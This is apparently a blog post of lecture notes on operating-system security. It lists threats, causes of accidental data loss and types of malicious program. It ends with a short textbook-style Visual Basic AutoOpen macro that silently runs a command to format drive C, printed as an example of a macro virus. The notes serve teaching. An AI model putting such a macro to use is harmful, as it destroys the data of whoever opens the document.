Security Environment
Security Problem
IntrudersSecurity Problem
- Security must consider external environment of the system, and protect the system resources.
- Intruders (crackers) attempt to breach security.
- Threat is potential security violation.
- Attack is attempt to breach security.
- Attack can be accidental or malicious.
- Easier to protect against accidental than malicious misuse.
Accidental Data Loss
- Hardware or Software error
- Disk crash
- Program bugs
- Human errors
- Wrong tape mounted
- Acts of God
- Earthquakes
- Wars
Program Threats
- Trojan Horse
- Exploits mechanisms for allowing programs written by users to be executed by other users.
- Spyware, pop-up browser windows, convert channels
- Trap Door
- Could be included in a compiler.
- Logic Bomp
- Stack and Buffer Overflow
- Viruses
- Very specific to CPU architecture, operating system, applications
- Usually borne via email or as a macro
* Visual Basic Macro to reformat hard drive
Sub AutoOpen( )
Dim oFS
set oFS = CreateObject("Scripting.FileSystemObject")
vs = Shell("c:command.com/kformat c:" ,vbHide)
End Sub
0 Comments:
Post a Comment